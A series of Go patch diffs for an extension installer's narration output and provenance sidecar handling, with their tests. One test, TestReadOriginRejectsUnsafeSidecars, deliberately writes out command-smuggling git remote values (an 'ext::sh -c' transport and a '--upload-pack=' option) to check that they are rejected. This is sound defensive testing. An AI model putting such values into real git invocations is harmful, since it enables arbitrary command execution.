+		return
+	}
+	_, _ = fmt.Fprintf(w, "\n%s %s %s %s %s\n\n",
+		style.paint(strings.Repeat(ruleGlyph, ruleLeadIn), logx.ColorDim),
+		painted,
+		style.paint(strings.Repeat(ruleGlyph, fill), logx.ColorDim),
+		style.paint(caption, logx.ColorDim),
+		style.paint(strings.Repeat(ruleGlyph, ruleTailIn), logx.ColorDim))
+}
+
+// rowSet buffers label/value pairs so the value column can be aligned to the
+// widest label actually present instead of a constant that every caller has to
+// keep in sync.
+type rowSet struct {
+	labels []string
+	values []string
+}
+
+func (r *rowSet) add(label string, value string) {
+	if value == "" {
+		return
+	}
+	r.labels = append(r.labels, label)
+	r.values = append(r.values, value)
+}
+
+func (r *rowSet) empty() bool { return len(r.labels) == 0 }
+
+// render writes the buffered rows, wrapping each value into the column so a
+// long list of domains or directives stays inside the terminal.
+func (r *rowSet) render(w io.Writer, style Style) {
+	labelWidth := 0
+	for _, label := range r.labels {
+		labelWidth = max(labelWidth, displayWidth(label))
+	}
+	valueColumn := len(bodyIndent) + labelWidth + labelGap
+	valueWidth := max(style.width()-valueColumn, minWidth/2)
+	continuation := strings.Repeat(" ", valueColumn)
+
+	for i, label := range r.labels {
+		padding := strings.Repeat(" ", labelWidth-displayWidth(label)+labelGap)
+		lines := wrapValue(r.values[i], valueWidth)
+		_, _ = fmt.Fprintf(w, "%s%s%s%s\n", bodyIndent, style.paint(label, logx.ColorDim), padding, lines[0])
+		for _, line := range lines[1:] {
+			_, _ = fmt.Fprintf(w, "%s%s\n", continuation, line)
+		}
+	}
+}
+
+// wrapValue breaks a value at spaces to fit width. Comma-joined lists break
+// after their separators for free. A single token longer than the column (a
+// long path, say) is left whole so it stays selectable in one piece.
+func wrapValue(value string, width int) []string {
+	words := strings.Fields(value)
+	if len(words) == 0 {
+		return []string{value}
+	}
+	lines := []string{}
+	current := words[0]
+	for _, word := range words[1:] {
+		if displayWidth(current)+1+displayWidth(word) > width {
+			lines = append(lines, current)
+			current = word
+			continue
+		}
+		current += " " + word
+	}
+	return append(lines, current)
+}
+
+// Outcome markers. Narration is a report on work already attempted, so these
+// mark how each line landed rather than decorating it.
+const (
+	markOK   = "✓"
+	markWarn = "!"
+	markInfo = "·"
+)
+
+func (e Env) outcome(style Style, mark string, color logx.Color, format string, args ...any) {
+	_, _ = fmt.Fprintf(e.narrate(), "%s%s %s\n", bodyIndent, style.paint(mark, color), fmt.Sprintf(format, args...))
+}
+
+// note is a continuation under the outcome line it qualifies, indented past the
+// marker so the two read as one item.
+func (e Env) note(style Style, format string, args ...any) {
+	_, _ = fmt.Fprintf(e.narrate(), "%s  %s\n", bodyIndent, style.paint(fmt.Sprintf(format, args...), logx.ColorDim))
+}
+
+// unchanged reports a no-op on one line instead of opening a section for it.
+// `update` with no names walks every installed extension, and most of them are
+// usually already current; a rule per no-op would bury the ones that changed.
+func (e Env) unchanged(name string, format string, args ...any) {
+	_, _ = fmt.Fprintf(e.narrate(), "%s%s %s %s\n",
+		bodyIndent,
+		e.Style.paint(markOK, logx.ColorGreen),
+		name,
+		e.Style.paint(fmt.Sprintf(format, args...), logx.ColorDim))
+}
+
+// summarize closes a run that touched more than one extension with a count per
+// outcome, so the tail of the output answers "what just happened" without
+// scrolling back through the blocks. A dry run gets none: every result is
+// ActionSkipped there, and "2 skipped" describes the rehearsal rather than the
+// two installs it just walked through.
+func (e Env) summarize(style Style, kind string, results []ActionResult, dryRun bool) {
+	if len(results) < 2 || dryRun {
+		return
+	}
+	order := []string{ActionInstalled, ActionUpdated, ActionUnchanged, ActionRemoved, ActionSkipped, ActionFailed}
+	counts := map[string]int{}
+	for _, result := range results {
+		counts[result.Action]++
+	}
+	parts := make([]string, 0, len(order))
+	for _, action := range order {
+		if counts[action] > 0 {
+			parts = append(parts, fmt.Sprintf("%d %s", counts[action], action))
+		}
+	}
+	if len(parts) == 0 {
+		return
+	}
+	color := logx.ColorGreen
+	if counts[ActionFailed] > 0 {
+		color = logx.ColorYellow
+	}
+	_, _ = fmt.Fprintf(e.narrate(), "\n%s\n", style.paint(fmt.Sprintf("%d %ss: %s", len(results), kind, strings.Join(parts, ", ")), color))
+}
+
+// displayWidth counts terminal cells. Every glyph this package prints is
+// single-width, so runes are the right unit and bytes are not: `credential →
+// host` is 17 cells and 19 bytes.
+func displayWidth(s string) int { return utf8.RuneCountInString(s) }

--- a/internal/extinstall/narrate.go
+++ b/internal/extinstall/narrate.go
@@ -83,15 +83,6 @@ func (e Env) section(name string, caption string) {
 	nameCells := ruleLeadIn + 1 + displayWidth(name) + 1 // "━━ name "
 	painted := style.paint(name, logx.ColorBold)
 
-	if caption == "" {
-		fill := width - nameCells
-		_, _ = fmt.Fprintf(w, "\n%s %s %s\n\n",
-			style.paint(strings.Repeat(ruleGlyph, ruleLeadIn), logx.ColorDim),
-			painted,
-			style.paint(strings.Repeat(ruleGlyph, max(fill, minRuleGap)), logx.ColorDim))
-		return
-	}
-
 	captionCells := 1 + displayWidth(caption) + 1 + ruleTailIn // " caption ━━"
 	fill := width - nameCells - captionCells
 	if fill < minRuleGap {

--- a/internal/extinstall/narrate.go
+++ b/internal/extinstall/narrate.go
@@ -76,8 +76,9 @@ func (s Style) paint(text string, color logx.Color) string {
 // section opens a block for one extension: a rule carrying the name on the
 // left and a caption such as `tool @ 8f0bbc7` on the right. When the two do not
 // fit on one line the caption moves below the rule rather than being truncated.
-func (e Env) section(style Style, name string, caption string) {
+func (e Env) section(name string, caption string) {
 	w := e.narrate()
+	style := e.Style
 	width := style.width()
 	nameCells := ruleLeadIn + 1 + displayWidth(name) + 1 // "━━ name "
 	painted := style.paint(name, logx.ColorBold)
@@ -178,14 +179,14 @@ const (
 	markInfo = "·"
 )
 
-func (e Env) outcome(style Style, mark string, color logx.Color, format string, args ...any) {
-	_, _ = fmt.Fprintf(e.narrate(), "%s%s %s\n", bodyIndent, style.paint(mark, color), fmt.Sprintf(format, args...))
+func (e Env) outcome(mark string, color logx.Color, format string, args ...any) {
+	_, _ = fmt.Fprintf(e.narrate(), "%s%s %s\n", bodyIndent, e.Style.paint(mark, color), fmt.Sprintf(format, args...))
 }
 
 // note is a continuation under the outcome line it qualifies, indented past the
 // marker so the two read as one item.
-func (e Env) note(style Style, format string, args ...any) {
-	_, _ = fmt.Fprintf(e.narrate(), "%s  %s\n", bodyIndent, style.paint(fmt.Sprintf(format, args...), logx.ColorDim))
+func (e Env) note(format string, args ...any) {
+	_, _ = fmt.Fprintf(e.narrate(), "%s  %s\n", bodyIndent, e.Style.paint(fmt.Sprintf(format, args...), logx.ColorDim))
 }
 
 // unchanged reports a no-op on one line instead of opening a section for it.
@@ -204,7 +205,7 @@ func (e Env) unchanged(name string, format string, args ...any) {
 // scrolling back through the blocks. A dry run gets none: every result is
 // ActionSkipped there, and "2 skipped" describes the rehearsal rather than the
 // two installs it just walked through.
-func (e Env) summarize(style Style, kind string, results []ActionResult, dryRun bool) {
+func (e Env) summarize(kind string, results []ActionResult, dryRun bool) {
 	if len(results) < 2 || dryRun {
 		return
 	}
@@ -226,7 +227,7 @@ func (e Env) summarize(style Style, kind string, results []ActionResult, dryRun 
 	if counts[ActionFailed] > 0 {
 		color = logx.ColorYellow
 	}
-	_, _ = fmt.Fprintf(e.narrate(), "\n%s\n", style.paint(fmt.Sprintf("%d %ss: %s", len(results), kind, strings.Join(parts, ", ")), color))
+	_, _ = fmt.Fprintf(e.narrate(), "\n%s\n", e.Style.paint(fmt.Sprintf("%d %ss: %s", len(results), kind, strings.Join(parts, ", ")), color))
 }
 
 // displayWidth counts terminal cells. Every glyph this package prints is

--- a/internal/extinstall/narration_test.go
+++ b/internal/extinstall/narration_test.go
@@ -23,10 +23,10 @@ func TestSectionSeparatesEveryExtension(t *testing.T) {
 	var out bytes.Buffer
 	env := Env{Narration: &out}
 
-	env.section(env.Style, "dsh", "tool @ 8f0bbc7")
-	env.outcome(env.Style, markOK, "", "installed at /somewhere/dsh")
-	env.section(env.Style, "openclaw", "tool @ 8f0bbc7")
-	env.outcome(env.Style, markOK, "", "installed at /somewhere/openclaw")
+	env.section("dsh", "tool @ 8f0bbc7")
+	env.outcome(markOK, "", "installed at /somewhere/dsh")
+	env.section("openclaw", "tool @ 8f0bbc7")
+	env.outcome(markOK, "", "installed at /somewhere/openclaw")
 
 	lines := strings.Split(out.String(), "\n")
 	rules := 0
@@ -89,7 +89,7 @@ func TestSectionMovesCaptionBelowWhenItCannotFit(t *testing.T) {
 	env := Env{Narration: &out, Style: Style{Width: minWidth}}
 	name := strings.Repeat("x", minWidth)
 
-	env.section(env.Style, name, "tool @ 8f0bbc7")
+	env.section(name, "tool @ 8f0bbc7")
 
 	if !strings.Contains(out.String(), name) {
 		t.Errorf("the name was dropped:\n%s", out.String())
@@ -105,11 +105,11 @@ func TestStyleZeroValueRendersPlainText(t *testing.T) {
 	var out bytes.Buffer
 	env := Env{Narration: &out}
 
-	env.section(env.Style, "dsh", "tool")
-	env.outcome(env.Style, markOK, "\x1b[32m", "installed")
-	env.note(env.Style, "the next run rebuilds the image")
+	env.section("dsh", "tool")
+	env.outcome(markOK, "\x1b[32m", "installed")
+	env.note("the next run rebuilds the image")
 	env.unchanged("openclaw", "up to date")
-	env.summarize(env.Style, "tool", []ActionResult{{Action: ActionInstalled}, {Action: ActionFailed}}, false)
+	env.summarize("tool", []ActionResult{{Action: ActionInstalled}, {Action: ActionFailed}}, false)
 
 	if strings.Contains(out.String(), "\x1b[") {
 		t.Errorf("the zero-value style emitted ANSI escapes:\n%q", out.String())
@@ -166,7 +166,7 @@ func TestSummarizeCountsOutcomes(t *testing.T) {
 		{Action: ActionInstalled}, {Action: ActionInstalled}, {Action: ActionFailed},
 	}
 
-	env.summarize(env.Style, "tool", results, false)
+	env.summarize("tool", results, false)
 
 	if want := "3 tools: 2 installed, 1 failed"; !strings.Contains(out.String(), want) {
 		t.Errorf("summary = %q, want it to contain %q", out.String(), want)
@@ -188,7 +188,7 @@ func TestSummarizeStaysQuietWhenItWouldMislead(t *testing.T) {
 		t.Run(tc.name, func(t *testing.T) {
 			var out bytes.Buffer
 			env := Env{Narration: &out}
-			env.summarize(env.Style, "tool", tc.results, tc.dryRun)
+			env.summarize("tool", tc.results, tc.dryRun)
 			if out.Len() != 0 {
 				t.Errorf("summary rendered anyway: %q", out.String())
 			}

--- a/internal/extinstall/narration_test.go
+++ b/internal/extinstall/narration_test.go
@@ -1,0 +1,79 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// TestNarrateWithoutStreamDiscards pins that this package never picks a process
+// stream of its own: with no narration configured there is nothing to render
+// to, and nothing is rendered.
+func TestNarrateWithoutStreamDiscards(t *testing.T) {
+	if got := (Env{}).narrate(); got != io.Discard {
+		t.Fatalf("narrate() = %v, want io.Discard", got)
+	}
+	if got := (Env{Narration: os.Stderr}).narrate(); got != os.Stderr {
+		t.Fatalf("narrate() = %v, want the configured stream", got)
+	}
+}
+
+// TestAddWithoutNarrationInstallsSilently covers the --json path: the installer
+// still does the work and still reports it through the returned results, but
+// renders no human-facing text anywhere.
+func TestAddWithoutNarrationInstallsSilently(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, out := testEnv(t, fetcher, "")
+	env.Narration = nil
+
+	results, err := Add(context.Background(), env, addRequest())
+	if err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if out.Len() != 0 {
+		t.Fatalf("narration was rendered despite a nil stream:\n%s", out.String())
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); statErr != nil {
+		t.Fatalf("extension was not installed: %v", statErr)
+	}
+}
+
+// TestConfirmWithoutNarrationFails pins that a run which may prompt but has
+// nowhere to put the question fails instead of assuming an answer.
+func TestConfirmWithoutNarrationFails(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "y\n")
+	env.Narration = nil
+
+	req := addRequest()
+	req.Yes = false
+	req.Interactive = true
+
+	results, err := Add(context.Background(), env, req)
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("a prompt with nowhere to render succeeded: %s", fmtResults(results))
+	}
+	message := results[0].Error
+	if err != nil {
+		message = err.Error()
+	}
+	if !strings.Contains(message, "--yes") {
+		t.Fatalf("error = %q, want it to point at --yes", message)
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); !os.IsNotExist(statErr) {
+		t.Fatal("an unconfirmed install wrote files")
+	}
+}

--- a/internal/extinstall/narration_test.go
+++ b/internal/extinstall/narration_test.go
@@ -8,6 +8,7 @@
 package extinstall
 
 import (
+	"bytes"
 	"context"
 	"io"
 	"os"
@@ -15,6 +16,185 @@ import (
 	"strings"
 	"testing"
 )
+
+// TestSectionSeparatesEveryExtension is the reason sections exist: a run that
+// touches several extensions has to show where one ends and the next begins.
+func TestSectionSeparatesEveryExtension(t *testing.T) {
+	var out bytes.Buffer
+	env := Env{Narration: &out}
+
+	env.section(env.Style, "dsh", "tool @ 8f0bbc7")
+	env.outcome(env.Style, markOK, "", "installed at /somewhere/dsh")
+	env.section(env.Style, "openclaw", "tool @ 8f0bbc7")
+	env.outcome(env.Style, markOK, "", "installed at /somewhere/openclaw")
+
+	lines := strings.Split(out.String(), "\n")
+	rules := 0
+	for i, line := range lines {
+		if !strings.HasPrefix(line, ruleGlyph) {
+			continue
+		}
+		rules++
+		if i == 0 || lines[i-1] != "" {
+			t.Errorf("rule %q is not preceded by a blank line", line)
+		}
+	}
+	if rules != 2 {
+		t.Fatalf("rendered %d rules, want one per extension:\n%s", rules, out.String())
+	}
+	for _, want := range []string{"dsh", "openclaw", "tool @ 8f0bbc7"} {
+		if !strings.Contains(out.String(), want) {
+			t.Errorf("section output is missing %q:\n%s", want, out.String())
+		}
+	}
+}
+
+// TestAddSeparatesTheBlocksOfEveryExtension is the end-to-end guard: whatever
+// each extension has to say, an --all run keeps one extension's output from
+// running into the next one's.
+func TestAddSeparatesTheBlocksOfEveryExtension(t *testing.T) {
+	files := fooRepoFiles()
+	files["extensions/features/bar/spec.yaml"] = "schemaVersion: \"1\"\nkind: mixin\nname: bar\n"
+	fetcher := newFakeFetcher(t, "a1b2c3d4", files)
+	env, out := testEnv(t, fetcher, "")
+
+	req := addRequest()
+	req.All = true
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --all: %v", err)
+	}
+	if len(results) != 2 {
+		t.Fatalf("results = %s, want two", fmtResults(results))
+	}
+
+	rendered := out.String()
+	for _, name := range []string{"foo", "bar"} {
+		if !strings.Contains(rendered, ruleGlyph+" "+name+" ") {
+			t.Errorf("no section rule for %q:\n%s", name, rendered)
+		}
+	}
+	if got := strings.Count(rendered, "\n"+ruleGlyph); got != 2 {
+		t.Errorf("counted %d section rules at the start of a line, want 2:\n%s", got, rendered)
+	}
+	if want := "2 features: 2 installed"; !strings.Contains(rendered, want) {
+		t.Errorf("run summary missing %q:\n%s", want, rendered)
+	}
+}
+
+// TestSectionMovesCaptionBelowWhenItCannotFit pins the narrow-terminal
+// fallback: the caption drops to its own line rather than being cut off.
+func TestSectionMovesCaptionBelowWhenItCannotFit(t *testing.T) {
+	var out bytes.Buffer
+	env := Env{Narration: &out, Style: Style{Width: minWidth}}
+	name := strings.Repeat("x", minWidth)
+
+	env.section(env.Style, name, "tool @ 8f0bbc7")
+
+	if !strings.Contains(out.String(), name) {
+		t.Errorf("the name was dropped:\n%s", out.String())
+	}
+	if !strings.Contains(out.String(), "tool @ 8f0bbc7") {
+		t.Errorf("the caption was dropped:\n%s", out.String())
+	}
+}
+
+// TestStyleZeroValueRendersPlainText pins that narration into a pipe or a test
+// buffer carries no escape sequences: color is opt-in, never the default.
+func TestStyleZeroValueRendersPlainText(t *testing.T) {
+	var out bytes.Buffer
+	env := Env{Narration: &out}
+
+	env.section(env.Style, "dsh", "tool")
+	env.outcome(env.Style, markOK, "\x1b[32m", "installed")
+	env.note(env.Style, "the next run rebuilds the image")
+	env.unchanged("openclaw", "up to date")
+	env.summarize(env.Style, "tool", []ActionResult{{Action: ActionInstalled}, {Action: ActionFailed}}, false)
+
+	if strings.Contains(out.String(), "\x1b[") {
+		t.Errorf("the zero-value style emitted ANSI escapes:\n%q", out.String())
+	}
+}
+
+func TestRowSetAlignsToTheWidestLabelPresent(t *testing.T) {
+	var out bytes.Buffer
+	rows := &rowSet{}
+	rows.add("ports", "3080")
+	rows.add("allowlist directives", "no-poll")
+	rows.add("skipped", "")
+	rows.render(&out, Style{})
+
+	lines := strings.Split(strings.TrimRight(out.String(), "\n"), "\n")
+	if len(lines) != 2 {
+		t.Fatalf("rendered %d lines, want the two non-empty rows:\n%s", len(lines), out.String())
+	}
+	first := strings.Index(lines[0], "3080")
+	second := strings.Index(lines[1], "no-poll")
+	if first != second {
+		t.Errorf("values start at columns %d and %d, want one column:\n%s", first, second, out.String())
+	}
+	// The column follows the widest label rather than a fixed constant.
+	if want := len(bodyIndent) + len("allowlist directives") + labelGap; first != want {
+		t.Errorf("value column = %d, want %d", first, want)
+	}
+}
+
+func TestWrapValueKeepsTokensWhole(t *testing.T) {
+	long := "conf-file=/etc/dnsmasq.allowlists/fragments/anthropic.conf"
+	lines := wrapValue(long+", no-poll, no-resolv", 40)
+
+	if len(lines) < 2 {
+		t.Fatalf("a value past the column was not wrapped: %q", lines)
+	}
+	if lines[0] != long+"," {
+		t.Errorf("first line = %q, want the long token whole", lines[0])
+	}
+	for _, line := range lines {
+		if strings.HasPrefix(line, " ") || strings.HasSuffix(line, " ") {
+			t.Errorf("line %q carries padding; the caller indents", line)
+		}
+	}
+	if joined := strings.Join(lines, " "); joined != long+", no-poll, no-resolv" {
+		t.Errorf("wrapping changed the value: %q", joined)
+	}
+}
+
+func TestSummarizeCountsOutcomes(t *testing.T) {
+	var out bytes.Buffer
+	env := Env{Narration: &out}
+	results := []ActionResult{
+		{Action: ActionInstalled}, {Action: ActionInstalled}, {Action: ActionFailed},
+	}
+
+	env.summarize(env.Style, "tool", results, false)
+
+	if want := "3 tools: 2 installed, 1 failed"; !strings.Contains(out.String(), want) {
+		t.Errorf("summary = %q, want it to contain %q", out.String(), want)
+	}
+}
+
+// TestSummarizeStaysQuietWhenItWouldMislead covers the two cases where a count
+// line is noise or a lie: a single extension, and a dry run whose results are
+// all ActionSkipped because nothing was meant to be written.
+func TestSummarizeStaysQuietWhenItWouldMislead(t *testing.T) {
+	for _, tc := range []struct {
+		name    string
+		results []ActionResult
+		dryRun  bool
+	}{
+		{"single extension", []ActionResult{{Action: ActionInstalled}}, false},
+		{"dry run", []ActionResult{{Action: ActionSkipped}, {Action: ActionSkipped}}, true},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			var out bytes.Buffer
+			env := Env{Narration: &out}
+			env.summarize(env.Style, "tool", tc.results, tc.dryRun)
+			if out.Len() != 0 {
+				t.Errorf("summary rendered anyway: %q", out.String())
+			}
+		})
+	}
+}
 
 // TestNarrateWithoutStreamDiscards pins that this package never picks a process
 // stream of its own: with no narration configured there is nothing to render

--- a/internal/extinstall/provenance.go
+++ b/internal/extinstall/provenance.go
@@ -1,0 +1,154 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"enclave/internal/model"
+	"enclave/internal/util"
+)
+
+// OriginSchemaVersion is the only sidecar schema this code writes or accepts.
+const OriginSchemaVersion = "1"
+
+// Ref types recorded in a sidecar. Only RefTypeCommit is immutable, which is
+// what lets update skip the network entirely for a pinned install.
+const (
+	RefTypeBranch = "branch"
+	RefTypeTag    = "tag"
+	RefTypeCommit = "commit"
+)
+
+// Origin is the recorded provenance of a managed extension.
+type Origin struct {
+	SchemaVersion string `json:"schemaVersion"`
+	Kind          string `json:"kind"`
+	Name          string `json:"name"`
+	Remote        string `json:"remote"`
+	Source        string `json:"source"`
+	Subpath       string `json:"subpath,omitempty"`
+	Ref           string `json:"ref"`
+	RefType       string `json:"refType"`
+	Commit        string `json:"commit"`
+	InstalledAt   string `json:"installedAt"`
+	InstalledBy   string `json:"installedBy"`
+	TreeHash      string `json:"treeHash"`
+}
+
+// readOrigin loads the sidecar from extDir. A missing sidecar is not an error:
+// it means the directory is unmanaged (hand-written, or installed before the
+// installer existed), and the caller decides what that implies.
+//
+// A sidecar can reach disk without ever passing through Add/Update — a user
+// can hand-author one, or clone a kit directly into their extensions
+// directory — so its remote/ref/name are validated here on read rather than
+// trusted as a writer-enforced invariant: updateOne feeds origin.Remote and
+// origin.Ref straight to the fetcher, which hands them to git as bare
+// operands.
+func readOrigin(extDir string) (*Origin, error) {
+	path := filepath.Join(extDir, model.ExtensionSourceFilename)
+	// #nosec G304 -- path is derived from a caller-supplied extension dir.
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil, nil
+		}
+		return nil, err
+	}
+	var origin Origin
+	if err := json.Unmarshal(data, &origin); err != nil {
+		return nil, fmt.Errorf("parse %s: %w", path, err)
+	}
+	if origin.SchemaVersion != OriginSchemaVersion {
+		return nil, fmt.Errorf("%s schemaVersion must be %q (got %q)", path, OriginSchemaVersion, origin.SchemaVersion)
+	}
+	if err := validateOriginRemote(origin.Remote); err != nil {
+		return nil, fmt.Errorf("%s remote: %w", path, err)
+	}
+	if err := validateRefName(origin.Ref); err != nil {
+		return nil, fmt.Errorf("%s ref %q: %w", path, origin.Ref, err)
+	}
+	if base := filepath.Base(extDir); origin.Name != "" && origin.Name != base {
+		return nil, fmt.Errorf("%s name %q does not match its directory %q", path, origin.Name, base)
+	}
+	// The installer never records credentials, but a hand-authored or copied
+	// sidecar can carry them, and these two fields are printed, serialized into
+	// `--json`, and handed to git. Redacting here rather than at each of those
+	// sinks means a new consumer cannot leak them by forgetting to.
+	origin.Remote = RedactRemote(origin.Remote)
+	origin.Source = RedactRemote(origin.Source)
+	return &origin, nil
+}
+
+// validateOriginRemote rejects a sidecar-recorded remote that is unsafe to
+// hand to the fetcher as a bare git operand, or that uses a transport this
+// feature never fetches with in the first place: an unrecognized or
+// `ext::`-style transport reaches git's remote-helper dispatch, which can run
+// arbitrary commands.
+func validateOriginRemote(remote string) error {
+	trimmed := strings.TrimSpace(remote)
+	if trimmed == "" {
+		return fmt.Errorf("remote is empty")
+	}
+	if strings.HasPrefix(trimmed, "-") {
+		return fmt.Errorf("remote %q looks like a command-line option", trimmed)
+	}
+	switch {
+	case hasScheme(trimmed), isSCPLike(trimmed), filepath.IsAbs(trimmed):
+		return nil
+	default:
+		return fmt.Errorf("remote %q uses an unsupported transport", trimmed)
+	}
+}
+
+// WriteOrigin writes the sidecar into extDir, replacing any existing one.
+func WriteOrigin(extDir string, origin Origin) error {
+	if origin.SchemaVersion == "" {
+		origin.SchemaVersion = OriginSchemaVersion
+	}
+	data, err := json.MarshalIndent(origin, "", "  ")
+	if err != nil {
+		return err
+	}
+	data = append(data, '\n')
+	return util.WriteFileAtomic(filepath.Join(extDir, model.ExtensionSourceFilename), data, 0o600)
+}
+
+// isLocallyModified reports whether extDir's content diverges from the tree
+// hash recorded at install time. An origin without a recorded hash is treated
+// as unmodified, since there is nothing to compare against.
+func isLocallyModified(extDir string, origin Origin) (bool, error) {
+	recorded := recordedTreeHash(origin)
+	if recorded == "" {
+		return false, nil
+	}
+	manifest, err := readTreeManifest(extDir)
+	if err != nil {
+		return false, err
+	}
+	return manifest.Hash != recorded, nil
+}
+
+// recordedTreeHash is the hash an extension's current content is compared
+// against, or "" when the sidecar records none.
+func recordedTreeHash(origin Origin) string {
+	return strings.TrimSpace(origin.TreeHash)
+}
+
+// ShortCommit abbreviates a commit for display.
+func ShortCommit(commit string) string {
+	if len(commit) <= 7 {
+		return commit
+	}
+	return commit[:7]
+}

--- a/internal/extinstall/provenance_test.go
+++ b/internal/extinstall/provenance_test.go
@@ -1,0 +1,281 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+func writeFixture(t *testing.T, path string, content string, mode os.FileMode) {
+	t.Helper()
+	if err := os.MkdirAll(filepath.Dir(path), 0o750); err != nil {
+		t.Fatalf("mkdir %s: %v", path, err)
+	}
+	if err := os.WriteFile(path, []byte(content), mode); err != nil {
+		t.Fatalf("write %s: %v", path, err)
+	}
+}
+
+// fixtureExtension builds a fixture directory named "foo": readOrigin checks
+// that a sidecar's recorded Name matches its directory's basename, and every
+// caller here writes a sidecar with Name: "foo".
+func fixtureExtension(t *testing.T) string {
+	t.Helper()
+	dir := filepath.Join(t.TempDir(), "foo")
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "install.sh"), "#!/bin/sh\necho hi\n", 0o755)
+	return dir
+}
+
+func TestOriginRoundTrip(t *testing.T) {
+	dir := fixtureExtension(t)
+	want := Origin{
+		SchemaVersion: OriginSchemaVersion,
+		Kind:          string(model.KindFeature),
+		Name:          "foo",
+		Remote:        "https://github.com/acme/kits",
+		Source:        "acme/kits/extensions/features/foo",
+		Subpath:       "extensions/features/foo",
+		Ref:           "main",
+		RefType:       RefTypeBranch,
+		Commit:        "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0",
+		InstalledAt:   "2026-08-26T10:15:00Z",
+		InstalledBy:   "enclave 1.0.0",
+		TreeHash:      "sha256:deadbeef",
+	}
+	if err := WriteOrigin(dir, want); err != nil {
+		t.Fatalf("WriteOrigin: %v", err)
+	}
+	got, err := readOrigin(dir)
+	if err != nil {
+		t.Fatalf("readOrigin: %v", err)
+	}
+	if got == nil {
+		t.Fatal("readOrigin returned nil for a written sidecar")
+	}
+	if *got != want {
+		t.Fatalf("round trip mismatch:\n got %+v\nwant %+v", *got, want)
+	}
+}
+
+// TestReadOriginRejectsUnsafeSidecars: readOrigin must reject a sidecar whose
+// remote, ref, or name is unsafe, because updateOne feeds those straight to
+// the fetcher, which hands them to git as bare operands.
+func TestReadOriginRejectsUnsafeSidecars(t *testing.T) {
+	baseOrigin := func() Origin {
+		return Origin{
+			SchemaVersion: OriginSchemaVersion,
+			Kind:          string(model.KindFeature),
+			Name:          "foo",
+			Remote:        "https://github.com/acme/kits",
+			Source:        "acme/kits",
+			Ref:           "main",
+			RefType:       RefTypeBranch,
+			Commit:        "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0",
+		}
+	}
+
+	cases := []struct {
+		name   string
+		mutate func(*Origin)
+	}{
+		{
+			name: "ext:: remote transport",
+			mutate: func(o *Origin) {
+				o.Remote = "ext::sh -c touch% /tmp/pwned"
+			},
+		},
+		{
+			name: "leading-dash remote",
+			mutate: func(o *Origin) {
+				o.Remote = "--upload-pack=touch /tmp/pwned;"
+			},
+		},
+		{
+			name: "mismatched name",
+			mutate: func(o *Origin) {
+				o.Name = "not-foo"
+			},
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			dir := fixtureExtension(t)
+			origin := baseOrigin()
+			tc.mutate(&origin)
+			if err := WriteOrigin(dir, origin); err != nil {
+				t.Fatalf("WriteOrigin: %v", err)
+			}
+			if _, err := readOrigin(dir); err == nil {
+				t.Fatalf("readOrigin accepted an unsafe sidecar (%s)", tc.name)
+			}
+		})
+	}
+}
+
+// TestReadOriginRedactsCredentials covers a hand-authored or copied sidecar:
+// the installer never records credentials, so redacting at the read boundary is
+// what keeps them out of every downstream printer, --json field, and git
+// invocation.
+func TestReadOriginRedactsCredentials(t *testing.T) {
+	dir := fixtureExtension(t)
+	if err := WriteOrigin(dir, Origin{
+		SchemaVersion: OriginSchemaVersion,
+		Kind:          string(model.KindFeature),
+		Name:          filepath.Base(dir),
+		Remote:        "https://user:s3cr3t@github.com/acme/kits",
+		Source:        "https://user:s3cr3t@github.com/acme/kits",
+		Ref:           "main",
+		RefType:       RefTypeBranch,
+		Commit:        "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0",
+	}); err != nil {
+		t.Fatalf("WriteOrigin: %v", err)
+	}
+
+	origin, err := readOrigin(dir)
+	if err != nil {
+		t.Fatalf("readOrigin: %v", err)
+	}
+	for field, got := range map[string]string{"Remote": origin.Remote, "Source": origin.Source} {
+		if strings.Contains(got, "s3cr3t") {
+			t.Errorf("origin.%s = %q, still carries the credential", field, got)
+		}
+		if !strings.Contains(got, "github.com/acme/kits") {
+			t.Errorf("origin.%s = %q, lost the remote itself", field, got)
+		}
+	}
+}
+
+func TestReadOriginAbsent(t *testing.T) {
+	origin, err := readOrigin(fixtureExtension(t))
+	if err != nil {
+		t.Fatalf("readOrigin: %v", err)
+	}
+	if origin != nil {
+		t.Fatalf("origin = %+v, want nil for an unmanaged directory", origin)
+	}
+}
+
+// TestTreeHashPinnedValue pins the digest TreeHash produces for a fixed tree.
